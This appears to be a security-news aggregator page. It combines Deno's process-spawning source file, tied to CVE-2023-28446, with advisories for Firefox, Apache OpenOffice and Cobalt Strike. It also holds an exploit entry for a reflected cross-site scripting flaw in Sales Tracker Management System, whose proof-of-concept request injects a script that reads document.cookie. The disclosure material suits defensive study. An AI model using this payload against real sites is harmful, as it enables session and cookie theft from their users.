// Copyright 2018-2023 the Deno authors. All rights reserved. MIT license. const core \= globalThis.Deno.core; const ops \= core.ops; const primordials \= globalThis.\_\_bootstrap.primordials; const { ArrayPrototypeMap, ArrayPrototypeSlice, TypeError, ObjectEntries, SafeArrayIterator, String, ObjectPrototypeIsPrototypeOf, PromisePrototypeThen, SafePromiseAll, SymbolFor, Symbol, } \= primordials; import { FsFile } from "internal:runtime/30\_fs.js"; import { readAll } from "internal:deno\_io/12\_io.js"; import { pathFromURL } from "internal:runtime/06\_util.js"; import { assert } from "internal:deno\_web/00\_infra.js"; import \* as abortSignal from "internal:deno\_web/03\_abort\_signal.js"; import { readableStreamCollectIntoUint8Array, readableStreamForRidUnrefable, readableStreamForRidUnrefableRef, readableStreamForRidUnrefableUnref, ReadableStreamPrototype, writableStreamForRid, } from "internal:deno\_web/06\_streams.js"; function opKill(pid, signo, apiName) { ops.op\_kill(pid, signo, apiName); } function kill(pid, signo \= "SIGTERM") { opKill(pid, signo, "Deno.kill()"); } function opRunStatus(rid) { return core.opAsync("op\_run\_status", rid); } function opRun(request) { assert(request.cmd.length \> 0); return ops.op\_run(request); } async function runStatus(rid) { const res \= await opRunStatus(rid); if (res.gotSignal) { const signal \= res.exitSignal; return { success: false, code: 128 + signal, signal }; } else if (res.exitCode != 0) { return { success: false, code: res.exitCode }; } else { return { success: true, code: 0 }; } } class Process { constructor(res) { this.rid \= res.rid; this.pid \= res.pid; if (res.stdinRid && res.stdinRid \> 0) { this.stdin \= new FsFile(res.stdinRid); } if (res.stdoutRid && res.stdoutRid \> 0) { this.stdout \= new FsFile(res.stdoutRid); } if (res.stderrRid && res.stderrRid \> 0) { this.stderr \= new FsFile(res.stderrRid); } } status() { return runStatus(this.rid); } async output() { if (!this.stdout) { throw new TypeError("stdout was not piped"); } try { return await readAll(this.stdout); } finally { this.stdout.close(); } } async stderrOutput() { if (!this.stderr) { throw new TypeError("stderr was not piped"); } try { return await readAll(this.stderr); } finally { this.stderr.close(); } } close() { core.close(this.rid); } kill(signo \= "SIGTERM") { opKill(this.pid, signo, "Deno.Process.kill()"); } } function run({ cmd, cwd \= undefined, clearEnv \= false, env \= {}, gid \= undefined, uid \= undefined, stdout \= "inherit", stderr \= "inherit", stdin \= "inherit", }) { if (cmd\[0\] != null) { cmd \= \[ pathFromURL(cmd\[0\]), ...new SafeArrayIterator(ArrayPrototypeSlice(cmd, 1)), \]; } const res \= opRun({ cmd: ArrayPrototypeMap(cmd, String), cwd, clearEnv, env: ObjectEntries(env), gid, uid, stdin, stdout, stderr, }); return new Process(res); } const illegalConstructorKey \= Symbol("illegalConstructorKey"); const promiseIdSymbol \= SymbolFor("Deno.core.internalPromiseId"); function spawnChildInner(opFn, command, apiName, { args \= \[\], cwd \= undefined, clearEnv \= false, env \= {}, uid \= undefined, gid \= undefined, stdin \= "null", stdout \= "piped", stderr \= "piped", signal \= undefined, windowsRawArguments \= false, } \= {}) { const child \= opFn({ cmd: pathFromURL(command), args: ArrayPrototypeMap(args, String), cwd: pathFromURL(cwd), clearEnv, env: ObjectEntries(env), uid, gid, stdin, stdout, stderr, windowsRawArguments, }, apiName); return new ChildProcess(illegalConstructorKey, { ...child, signal, }); } function spawnChild(command, options \= {}) { return spawnChildInner( ops.op\_spawn\_child, command, "Deno.Command().spawn()", options, ); } function collectOutput(readableStream) { if ( !(ObjectPrototypeIsPrototypeOf(ReadableStreamPrototype, readableStream)) ) { return null; } return readableStreamCollectIntoUint8Array(readableStream); } class ChildProcess { #rid; #waitPromiseId; #unrefed \= false; #pid; get pid() { return this.#pid; } #stdin \= null; get stdin() { if (this.#stdin \== null) { throw new TypeError("stdin is not piped"); } return this.#stdin; } #stdoutRid; #stdout \= null; get stdout() { if (this.#stdout \== null) { throw new TypeError("stdout is not piped"); } return this.#stdout; } #stderrRid; #stderr \= null; get stderr() { if (this.#stderr \== null) { throw new TypeError("stderr is not piped"); } return this.#stderr; } constructor(key \= null, { signal, rid, pid, stdinRid, stdoutRid, stderrRid, } \= null) { if (key !== illegalConstructorKey) { throw new TypeError("Illegal constructor."); } this.#rid \= rid; this.#pid \= pid; if (stdinRid !== null) { this.#stdin \= writableStreamForRid(stdinRid); } if (stdoutRid !== null) { this.#stdoutRid \= stdoutRid; this.#stdout \= readableStreamForRidUnrefable(stdoutRid); } if (stderrRid !== null) { this.#stderrRid \= stderrRid; this.#stderr \= readableStreamForRidUnrefable(stderrRid); } const onAbort \= () \=> this.kill("SIGTERM"); signal?.\[abortSignal.add\](onAbort); const waitPromise \= core.opAsync("op\_spawn\_wait", this.#rid); this.#waitPromiseId \= waitPromise\[promiseIdSymbol\]; this.#status \= PromisePrototypeThen(waitPromise, (res) \=> { this.#rid \= null; signal?.\[abortSignal.remove\](onAbort); return res; }); } #status; get status() { return this.#status; } async output() { if (this.#stdout?.locked) { throw new TypeError( "Can't collect output because stdout is locked", ); } if (this.#stderr?.locked) { throw new TypeError( "Can't collect output because stderr is locked", ); } const { 0: status, 1: stdout, 2: stderr } \= await SafePromiseAll(\[ this.#status, collectOutput(this.#stdout), collectOutput(this.#stderr), \]); return { success: status.success, code: status.code, signal: status.signal, get stdout() { if (stdout \== null) { throw new TypeError("stdout is not piped"); } return stdout; }, get stderr() { if (stderr \== null) { throw new TypeError("stderr is not piped"); } return stderr; }, }; } kill(signo \= "SIGTERM") { if (this.#rid \=== null) { throw new TypeError("Child process has already terminated."); } ops.op\_kill(this.#pid, signo, "Deno.Child.kill()"); } ref() { this.#unrefed \= false; core.refOp(this.#waitPromiseId); if (this.#stdout) readableStreamForRidUnrefableRef(this.#stdout); if (this.#stderr) readableStreamForRidUnrefableRef(this.#stderr); } unref() { this.#unrefed \= true; core.unrefOp(this.#waitPromiseId); if (this.#stdout) readableStreamForRidUnrefableUnref(this.#stdout); if (this.#stderr) readableStreamForRidUnrefableUnref(this.#stderr); } } function spawn(command, options) { if (options?.stdin \=== "piped") { throw new TypeError( "Piped stdin is not supported for this function, use 'Deno.Command().spawn()' instead", ); } return spawnChildInner( ops.op\_spawn\_child, command, "Deno.Command().output()", options, ) .output(); } function spawnSync(command, { args \= \[\], cwd \= undefined, clearEnv \= false, env \= {}, uid \= undefined, gid \= undefined, stdin \= "null", stdout \= "piped", stderr \= "piped", windowsRawArguments \= false, } \= {}) { if (stdin \=== "piped") { throw new TypeError( "Piped stdin is not supported for this function, use 'Deno.Command().spawn()' instead", ); } const result \= ops.op\_spawn\_sync({ cmd: pathFromURL(command), args: ArrayPrototypeMap(args, String), cwd: pathFromURL(cwd), clearEnv, env: ObjectEntries(env), uid, gid, stdin, stdout, stderr, windowsRawArguments, }); return { success: result.status.success, code: result.status.code, signal: result.status.signal, get stdout() { if (result.stdout \== null) { throw new TypeError("stdout is not piped"); } return result.stdout; }, get stderr() { if (result.stderr \== null) { throw new TypeError("stderr is not piped"); } return result.stderr; }, }; } class Command { #command; #options; constructor(command, options) { this.#command \= command; this.#options \= options; } output() { if (this.#options?.stdin \=== "piped") { throw new TypeError( "Piped stdin is not supported for this function, use 'Deno.Command.spawn()' instead", ); } return spawn(this.#command, this.#options); } outputSync() { if (this.#options?.stdin \=== "piped") { throw new TypeError( "Piped stdin is not supported for this function, use 'Deno.Command.spawn()' instead", ); } return spawnSync(this.#command, this.#options); } spawn() { const options \= { ...(this.#options ?? {}), stdout: this.#options?.stdout ?? "inherit", stderr: this.#options?.stderr ?? "inherit", stdin: this.#options?.stdin ?? "inherit", }; return spawnChild(this.#command, options); } } export { ChildProcess, Command, kill, Process, run };

CVE-2023-28446: deno/40_process.js at 7d13d65468c37022f003bb680dfbddd07ea72173 · denoland/deno

Sales Tracker Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Sales Tracker Management System - Cross Site Scripting Vulnerability (Authenticated)# Date: 23/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-sts_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Sales Tracker Management System allows remote authenticated users to execute JavaScript code. ## Request PoC```GET /php-sts/admin/?page=clients'%3balert(document.cookie)%2f%2f HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/php-sts/admin/Cookie: PHPSESSID=n0brm8te79kaf0nvf7d1hvs6rm```

Sales Tracker Management System 1.0 Cross Site Scripting

Red Hat Security Advisory 2023-1444-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1444-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1444  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
firefox-102.9.0-4.el8_4.src.rpm

aarch64:  
firefox-102.9.0-4.el8_4.aarch64.rpm  
firefox-debuginfo-102.9.0-4.el8_4.aarch64.rpm  
firefox-debugsource-102.9.0-4.el8_4.aarch64.rpm

ppc64le:  
firefox-102.9.0-4.el8_4.ppc64le.rpm  
firefox-debuginfo-102.9.0-4.el8_4.ppc64le.rpm  
firefox-debugsource-102.9.0-4.el8_4.ppc64le.rpm

s390x:  
firefox-102.9.0-4.el8_4.s390x.rpm  
firefox-debuginfo-102.9.0-4.el8_4.s390x.rpm  
firefox-debugsource-102.9.0-4.el8_4.s390x.rpm

x86_64:  
firefox-102.9.0-4.el8_4.x86_64.rpm  
firefox-debuginfo-102.9.0-4.el8_4.x86_64.rpm  
firefox-debugsource-102.9.0-4.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7dzjgjWX9erEAQjFAw/+POMLis7JDkGsJrJysMHCnABjVMQOFj2o  
eTv2yQG5FekOOXpbeoR9hNWZmI3EKQ6weJtRSKqcPZHC5vBpoTLAPr1gJ8r6eR6f  
msbEAczb9Qx2b5f6b95bvnWrrdVDOV+hso1QTJZhSSXWtcdiHgX3RnyUx3kvqcCx  
v9aib86RhZBKBt6IsXpNOFjKzR9tGXghHgN6tUrvc1h894GmcC4yjZj5jAcwzyQS  
gOytV4CjzZnfUaU0J2mOs5KW+nt0zmhMC9U/hHBeS5WWGfO4w+psk79GoZi0MBzQ  
DWehVqtblQWO/4eYRnAm2kfKlV9wKoRAXnZfSKfLE2we+R5csIxFNXCSjhXf94c5  
cvNZiLisQj3qDlo0tEZZSNUYV+CUs5Ay2W2ultkBVTqkWcJSwygW+9Ff0SCxTZUA  
1nciKqoCCdc7sh5cy7lyR7S73gDWp1iPpg+1zrEpsrSIQ8pKSmeoXFyKO/ALiEai  
qlCkpjM91uUipDDFuvSC6EyQPmwYzyo3BfPe33pK+eIhDxNnTx8J7aVgH/dfvY7U  
OHkHWWZfzM68zGhFa1ddA2HwghNGVn//g+xrG9U1QJzf83hcLkC6NxIfmkfJODom  
yRgo93DpoCuOtPYp2I8oCEyncmB0D3YOWDzn+k5+BQH7V5dAeHMRiiELjs14Tnqo  
50sdrHMYz/g£8J  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1444-01

Apache OpenOffice versions before 4.1.14 may be configured to add an empty entry to the Java class path. This may lead to run arbitrary Java code from the current directory.

CVE-2022-38745

Apache OpenOffice Advisory

**An empty class path may lead to run arbitrary Java code**

**Fixed in Apache OpenOffice 4.1.14**

**Description**

Apache OpenOffice versions before 4.1.14 may be configured to add an empty entry to the Java class path. This may lead to run arbitrary Java code from the current directory.

**Severity: Moderate**

There are no known exploits of this vulnerability.  
A proof-of-concept demonstration does not exist.

Thanks to the reporter for discovering this issue.

**Vendor: The Apache Software Foundation**

**Versions Affected**

All Apache OpenOffice versions 4.1.13 and older are affected.  
OpenOffice.org versions may also be affected.

**Mitigation**

Install Apache OpenOffice 4.1.14 for the latest maintenance and cumulative security fixes. Use the Apache OpenOffice download page.

**Acknowledgments**

The Apache OpenOffice Security Team would like to thank the European Commission's Open Source Programme Office for discovering and reporting this attack vector.

**Further Information**

For additional information and assistance, consult the Apache OpenOffice Community Forums or make requests to the users@openoffice.apache.org public mailing list.

The latest information on Apache OpenOffice security bulletins can be found at the Bulletin Archive page.

Security Home\-> Bulletin\-> CVE-2022-38745

CVE-2022-38745: CVE-2022-38745

Cobalt Strike 4.7.1 fails to properly escape HTML tags when they are displayed on Swing components. By injecting crafted HTML code, it is possible to remotely execute code in the Cobalt Strike UI.

****NAME****

**HelpSystems Cobalt Strike code execution**

*   **Platforms Affected:**  
    HelpSystems Cobalt Strike 4.7.1  
    
*   **Risk Level:**  
    9.8  
    
*   **Exploitability:  
    **Unproven  
    
*   **Consequences:**  
    Gain Access

****DESCRIPTION****

**HelpSystems Cobalt Strike could allow a remote attacker to execute arbitrary code on the system, caused by a vulnerability in the C2 framework. By creating Swing components from user input, an attacker could exploit this vulnerability to create arbitrary Java objects in the class path and invoke their setter methods, resulting in a code execution.**

**CVSS 3.0 Information**

*   **Privileges Required:** None
*   **User Interaction:** None
*   **Scope:** Unchanged
*   **Access Vector:** Network
*   **Access Complexity:** Low
*   **Confidentiality Impact:** High
*   **Integrity Impact:** High
*   **Availability Impact:** High
*   **Remediation Level:** Official Fix  
    

****MITIGATION****

**Upgrade to the latest version of Cobalt Strike (4.7.2 or later), available from the Cobalt Strike Web site. See References.**

*   **Reference Link:**  
    https://www.cobaltstrike.com/  
    
*   **Reference Link:**  
    https://securityintelligence.com/posts/analysis-rce-vulnerability-cobalt-strike/  
    

A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.

If you like the site, please support us on Patreon using the button below

To keep up to date follow us on the below channels.

Click Above for Telegram

Click Above for Discord

Click Above for Reddit

Click Above For LinkedIn

**Post navigation**

Tag

#java